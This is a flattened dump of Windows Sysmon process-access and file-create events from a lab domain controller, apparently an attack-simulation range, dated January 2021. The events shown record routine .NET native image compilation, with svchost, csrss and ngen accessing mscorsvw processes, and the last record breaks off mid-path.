13:51:43.725{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A704-00000000A301}1464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.615{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.600{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.600{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A604-00000000A301}4684C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:43.537{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\db0-0\UIAutomationClient.dll2021-01-18 13:51:43.537 10341000x80000000000000008893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.303{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.303{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.303{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A504-00000000A301}3504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.225{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.225{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.225{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A404-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:43.084{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.084{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A304-00000000A301}1584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:43.037{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ecc-0\System.Xml.Serialization.dll2021-01-18 13:51:43.037 10341000x80000000000000008883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:43.006{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:42.990{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:42.990{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-926F-6005-A204-00000000A301}3788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.912{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.896{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.896{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AE04-00000000A301}1508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.834{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.818{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:44.818{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9270-6005-AD04-00000000A301}3508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:44.771{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9270-6005-AC04-00000000A301}3244C:\Program 
